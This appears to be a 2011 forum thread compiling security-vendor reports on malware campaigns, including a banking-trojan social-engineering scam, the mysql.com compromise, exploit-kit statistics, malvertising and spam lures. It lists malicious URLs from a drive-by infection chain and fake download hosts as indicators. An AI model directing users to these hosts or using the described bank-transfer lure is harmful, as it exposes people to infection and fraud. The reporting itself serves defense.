Fake transfers are latest Bank Heist ...
- http://www.trusteer.com/blog/fictitious-transfers-are-latest-bank-heist
September 20, 2011 - "A number of banks, in an effort to validate and secure financial transactions, are utilising transaction verification systems. They’re doing this in the belief that, even if malware manages to change transaction details on the fly, the customer has an out of band channel to verify that it has not been modified. This is based on the assumption that malware cannot infect the out of band channel, and therefore the bank or the customer will be able to detect fraudulent transfers... the assumption that malware cannot influence the out of band channel is flawed. The easiest way to defeat transaction verification systems is using social engineering attacks. Over the years we've seen a number of different variants against transaction verification systems... Using malware fraudsters first gain control over the web channel. This means -any- information that customers view inside their browser, while connected to their bank, can be modified by the fraudsters. Unfortunately, customers are usually -unable- to distinguish whether what they are seeing was actually served by the bank, or in fact modified by malware! This is giving fraudsters the ability to launch extremely effective social engineering attacks. In the attack we've recently seen, fraudsters were simply waiting for customers to log on to their bank's website. The bank robber then ‘changed’ the content of the post login page, to a message, informing customers of an upgraded security system. The customer is invited to go through a training process that intends to help him/her deal with the bank's upgraded security system. As part of the training they’re asked to make a transfer, to a fictitious bank account, and confirm the transaction using the confirmation code that is sent by the bank to the registered mobile phone. Fraudsters claim that the user's account will not be debited and the recipient's account is fabricated... the transaction then happens, the money is transferred, and the criminal disappears off into the sunset..."
(More detail at the trusteer URL above.)


2011-09-23, 21:19

Japan - MHI hacked ...
- http://www.itpro.co.uk/636271/japan-attacked-can-we-say-cyber-war-now
21 Sep 2011 - "... Mitsubishi Heavy Industries, one of Japan’s major weapons suppliers, admitted 45 of its servers and 38 computer terminals were infected. Targeted malware was allegedly used as part of a spear phishing attempt – similar to other attacks that have attempted to breach Governments in recent times, including in the UK. RSA was compromised by such tactics too – another situation in which some suspected a nation state’s involvement, as at least one of the eventual targets turned out to be major US defence contractor Lockheed Martin... In the case of MHI, no one has yet claimed responsibility for the infection. China, the number one suspect according to some sources, has denied any involvement. As with so many recent cases, no nation has been found guilty, nor has any Government admitted to being the perpetrator of an attack. When the DigiNotar attacks emerged last month, eventually resulting in the certificate authority’s demise, many pointed fingers at Iran. Yet in that case, ComodoHacker claimed responsibility, saying the Iranian regime had no hand in the hacks. For any onlookers, it’s near to impossible to know whom to trust. There is just too much obfuscation and potential for covert behaviour to lump any event under the ‘cyber war’ umbrella... As information remains a hugely valuable commodity, and hacking becomes an increasingly useful tool for acquiring it, cyber war will still focus heavily on data, rather than causing real-world havoc. Both public and private organisations will therefore be targets... individuals will be affected. There will be civilian casualties too, in the data sense at least..."


2011-09-24, 16:11

Fake "browser update" worm ...
- http://www.malwarecity.com/blog/update-your-browser-hmm-ill-pass-1155.html
23 September 2011 - "... As the DNS infrastructure is well defended against attacks, cyber-crooks often try to mess with the local DNS settings. This is the case of the infections with Worm.Rorpian.E that, once it successfully infects a computer on the network, starts acting as a DHCP server (an application that manages the connectivity of the network computers) and tampers with the local DNS servers to resolve all the requests to a rogue IP in Romania...
If you give in to the demand and “update your browser”, you’ll get infected with the same Worm.Rorpian.E, and your PC will start acting like a rogue DHCP server for the other clients connected to your network. Once the user clicks the “browser update” button, a php script fetches the malware from the server and names it as updbrowser[date].exe, where date is the current year, month and day. Of course, since we’re talking about cybercrime, the infection wasn’t only designed for fun. Once your PC has been infected with the “browser patch”, the worm starts bringing its friends to the party, cloaked by the infamous TDSS rootkit. Rorpian also has secondary spreading mechanisms: it “jumps” via network shares, exploits a couple of old, critical vulnerabilities such asthe .LNK (MS10-046) and the one in the Windows DNS RPC Interface (MS07-029) to download and execute further malware onto the infected PCs..."
(More detail at the malwarecity URL above.)


2011-09-26, 22:42

mysql.com hacked - malware served to visitors...
- http://blog.armorize.com/2011/09/mysqlcom-hacked-infecting-visitors-with.html
9.26.2011 - "Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked...
Step 1: http ://www .mysql .com
Causes the visiting browser to load the following:
Step 2: http ://mysql .com /common/js/s_code_remote.js?ver=20091011...
Step 3: http ://falosfax .in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http ://mysql .com/
Throws out a 302 redirect to Step 4.
Step 4: http ://truruhfhqnviaosdpruejeslsuy .cx.cc/main.php
This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql .com with a vulnerable browsing platform will result in an infection.
Currently, 9 out of 44 vendors on VirusTotal* can detect this piece of malware."
(More detail at the armorize URL above.)

** http://www.virustotal.com/file-scan/report.html?id=d761babcb55d21b467dd698169c921995bf58eac5e9912596693fee52c8690a1-1317040603
File name: w.php
Submission date: 2011-09-26 20:23:24 (UTC)
Result: 9/44 (20.5%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=d761babcb55d21b467dd698169c921995bf58eac5e9912596693fee52c8690a1-1317260745
File name: e1d511259779f6a02f2a61cfedc2551ec70885b6.bin
Submission date: 2011-09-29 01:45:45 (UTC)
Result: 28/43 (65.1%)

- https://krebsonsecurity.com/2011/09/mysql-com-sold-for-3k-serves-malware/
Monday, September 26th, 2011 at 3:52 pm - "... it appears the malicious scripts were injected into the site sometime within the last seven hours. If that’s accurate, that was enough time for approximately 120,000 Internet users to browse the site and expose their systems to the exploit kit..."
> http://www.alexa.com/search?q=mysql.com&r=home_home&p=bigtop

- https://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware
September 26, 2011 03:19 PM ET - "... Armorize noticed the problem at around 5 a.m. Pacific Time Monday. Hackers had installed JavaScript code that threw a variety of known browser attacks at visitors to the site, so those with out-of-date browsers or unpatched versions of Adobe Flash, Reader or Java on their Windows PCs could have been quietly infected with malicious software. By just after 11 a.m., the issue had been cleaned up, said Wayne Huang, Armorize's CEO..."

- https://isc.sans.edu/diary.html?storyid=11638
Last Updated: 2011-09-26 21:50:32 UTC – “… now been cleaned up on mysql .com but no further words on the scope of the compromise. It also appears to be the second time this year*. In the last incident, SQL injection was used to gain access to the information on the site.”
* https://www.scmagazineus.com/oracles-mysqlcom-hacked-via-sql-injection/article/199419/
March 28, 2011


2011-09-28, 13:56

Malicious emails with subject “ACH Payment xxxxx Canceled”
- http://community.websense.com/blogs/securitylabs/archive/2011/09/28/malicious-emails-with-subject-ach-payment-xxxxx-canceled.aspx
28 Sep 2011 01:00 AM - "Have you got an email with subject “ACH Payment xxxxx Canceled” ? Please don’t open the url in the email. Because it will take you to a malicious url. Websense... has detected that an email campaign broke out on 27th September, 2011. In this campaign, all the emails with the subject “ACH Payment xxxxxx Canceled”, xxxx means random numbers generated from spamers. Each email in this campaign has one same url, after being clicked, victims will be led to various malicous links, via redirection, finally downloaded trojan files without any notice... Now we can see there is a iframe in its payload, it will lead you to redirect to another malicious url. That malicious url hosts blackhole exploit kit, which is the most widely used exploit kits. It will download a Zbot file, which has been confirmed by VirusTotal*... more than 200,000 messages in this campaign..."
* https://www.virustotal.com/file-scan/report.html?id=8ccaf0c60797a663d1360af83e99f92522ddc977ec5510cbaf29ffefe6a225fc-1317198424
File name: calc[1].ex_e
Submission date: 2011-09-28 08:27:04 (UTC)
Result: 29/43 (67.4%)
There is a more up-to-date report,,,
- https://www.virustotal.com/file-scan/report.html?id=8ccaf0c60797a663d1360af83e99f92522ddc977ec5510cbaf29ffefe6a225fc-1317334191
File name: 13172629856976457567
Submission date: 2011-09-29 22:09:51 (UTC)
Result: 29/42 (69.0%)

- http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/
September 6, 2011


2011-09-28, 20:22

How to get infected with malware...
- https://www.csis.dk/en/csis/news/3321
2011-09-27 - "When a Microsoft Windows machine gets infected by viruses/malware it does so mainly because users forget to update the Java JRE, Adobe Reader/Acrobat and Adobe Flash... CSIS has over a period of almost three months actively collected real time data from various so-called exploit kits. An exploit kit is a commercial hacker toolbox that is actively exploited by computer criminals who take advantage of vulnerabilities in popular software. Up to 85 % of all virus infections occur as a result of drive-by attacks automated via commercial exploit kits. The purpose of this study is to reveal precisely how Microsoft Windows machines are infected with the virus/malware and which browsers, versions of Windows and third party software that are at risk. We have monitored more than 50 different exploit kits on 44 unique servers/IP addresses... The statistical material covers all in all more than half a million user exposures out of which as many as 31.3 % were infected with the virus/malware due to missing security updates... On the basis of the total statistical data of this study it is documented that following products frequently are abused by malware in order to infect Windows machines: Java JRE, Adobe Reader/Acrobat, Adobe Flash and Microsoft Internet Explorer... The conclusion of this study is that as much as 99.8 % of all virus/malware infections caused by commercial exploit kits are a direct result of the lack of updating five specific software packages*..."
* https://www.csis.dk/images/infection.Png

> https://www.csis.dk/images/browser.Png

> https://www.csis.dk/images/os.Png


2011-09-29, 16:38

More bad ads in Bing
- http://sunbeltblog.blogspot.com/2011/09/more-bad-ads-in-bing.html
September 29, 2011 - "... they're back again - this time promoting fake Firefox downloads whose ads are displayed when searching for... "Firefox download"... they missed a trick there, advertising Firefox 6 instead of the freshly minted Firefox 7. The URLs involved are hotelcrystalpark(dot)com/firefox_1 and firefox(dot)dl-labs(dot)com, with the rogue downloads being hosted at the dl-labs URL. VirusTotal score* currently gives us 6/43, with VIPRE detecting this as Trojan.Win32.Kryptik.cqw (v)..."
* https://www.virustotal.com/file-scan/report.html?id=1417e815b627d079f3809a941904781b947345e9e5cfd59dd563ebc5c772c285-1317230589
File name: firefox_6.s0.1.exe_
Submission date: 2011-09-28 17:23:09 (UTC)
Result: 6/43 (14.0%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=1417e815b627d079f3809a941904781b947345e9e5cfd59dd563ebc5c772c285-1318368926
File name: firefox_6.s0.1.exe_
Submission date: 2011-10-11 21:35:26 (UTC)
Current status: finished
Result: 27/43 (62.8%)


2011-10-02, 03:14

Fake pharma domains suspended
- http://www.theregister.co.uk/2011/09/30/nominet_suspends_fake_pharma_addresses/
30 September 2011 - "Nominet, the .uk address registry, has suspended hundreds of internet domain names as part of a global police crackdown on crime gangs peddling fake pharmaceuticals. Operation Pangea IV saw almost 13,500 websites taken down and dozens of suspects arrested in 81 countries, according to Interpol, which coordinated the swoop. Over 2.4 million potentially harmful counterfeit pills, worth about £4m, were seized in raids between 20 and 27 of September, Interpol said. Confiscated medicines included everything from diet pills to anti-cancer drugs. Cops worked with customs agencies, ISPs, payment processors and delivery companies to close down the allegedly criminal operations, Interpol said. In the UK, Nominet acted upon advice given by the Medicines and Healthcare products Regulatory Agency and the Police Central e-Crime Unit to suspend about 500 .uk domains.."


2011-10-06, 12:39

Facebook malvertisement leads to Exploits
- http://blog.trendmicro.com/facebook-malvertisement-leads-to-exploits/
Oct. 4, 2011 - "... We encountered an infection chain wherein the user is led from a page within Facebook to a couple of ad sites then, finally, to a page that hosts exploits. When we traced the connection between the ad sites and Facebook, we found that the ad providers were affiliated with a certain Facebook application. We checked out the said application and found that it is indeed ad supported. We were able to come up with the likely infection chain... Upon accessing the application, the malvertisement gets loaded, triggering a series of redirections. The redirections finally lead to a malicious site, which then loads several exploits, particularly those related to Java and ActiveX:
• CVE-2006-0003: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0003
• CVE-2010-4452: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4452
• CVE-2010-1423: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1423
The exploits were loaded to download more malicious files although we weren’t able to trace these anymore since the URLs they accessed were already inaccessible... Malvertisements are considered grave threats, especially since much like website compromises, attacks related to these usually involve trusted sites that users already typically visit without risk of system infection..."
(More detail at the trendmicro URL above.)


2011-10-06, 14:11

Halloween malware, scares, scams ...
- http://community.websense.com/blogs/securitylabs/archive/2011/10/05/first-wave-of-halloween-scare.aspx
5 Oct 2011 - "... malware authors have already concocted a brew of early scares: blackhat SEO, fake Adobe Flash notification, and a malicious file download... start with the search term "halloween skeleton templates," which brings up a poisoned search result. The link redirects users to what appears to be a fake YouTube site... The fake YouTube site uses nude images of celebrities like Emma Watson and Paris Hilton as a ploy. These, along with salacious captions, are meant to entice users into playing the apparent video. When users click any of the links on the page, they are prompted to update Adobe Flash Player... Users who fall for the trick are prompted to download a malicious file called scandsk.exe, identified by 15/43 VirusTotal* engines..."
* https://www.virustotal.com/file-scan/report.html?id=0716b10d60f7f82b28d04c81654f64a37069354b66da3a2082f3619860c9d774-1317839174
File name: scandsk.exe
Submission date: 2011-10-05 18:26:14 (UTC)
Result: 15/43 (34.9%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=0716b10d60f7f82b28d04c81654f64a37069354b66da3a2082f3619860c9d774-1318022043
File name: afe4e70aa3210b8b04c53330d6037378a0aeaf7f.bin
Submission date: 2011-10-07 21:14:03 (UTC)
Result: 21/43 (48.8%)


2011-10-07, 15:22

Blackhole Exploit + Rogue AV capitalizes on Steve Jobs' passing
- http://community.websense.com/blogs/securitylabs/archive/2011/10/06/blackhole-exploit-rogue-av-capitalizes-on-steve-jobs-passing.aspx
6 Oct 2011 - "Websense... has detected malicious email messages claiming that the late Apple founder and CEO, Steve Jobs, is still alive... Some of the email subjects used in this attack include :
Steve Jobs: Not Dead Yet!
Steve Jobs Alive!
Steve Jobs Not Dead
The email messages contain links to compromised web sites that redirect to Blackhole Exploit Kit and install Rogue AV malware. The malicious file used in this attack is poorly detected by AV engines*. As always, don't click on links in emails you didn't expect to receive, they tend to be bad news."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=545de2c3a1f0d50949da842601fa699fb741efc9baef6b22c99192923d80f19c-1317941431
File name: contacts.exe
Submission date: 2011-10-06 22:50:31 (UTC)
Result: 5/43 (11.6%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=545de2c3a1f0d50949da842601fa699fb741efc9baef6b22c99192923d80f19c-1318232093
File name: worms.exe
Submission date: 2011-10-10 07:34:53 (UTC)
Current status: finished
Result: 18/43 (41.9%)

Facebook scammers exploit Steve Jobs' death
- http://nakedsecurity.sophos.com/2011/10/06/steve-jobs-death-facebook-scam/
6 October 2011

Malicious SPAM...
- http://blog.trendmicro.com/steve-jobs-proclaimed-alive-by-spam/
Oct. 7, 2011

- http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/
October 7, 2011


2011-10-12, 18:28

Virus outbreak in Progress...
- http://www.ironport.com/toc/
Octiober 12, 2011

> http://tools.cisco.com/security/center/threatOutbreak.x?i=77

Fake IRS Arrears Document E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24284
Malicious Link E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24350
Fake Online Reservation Status E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24351
Fake FedEx Package Delivery Failure E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24349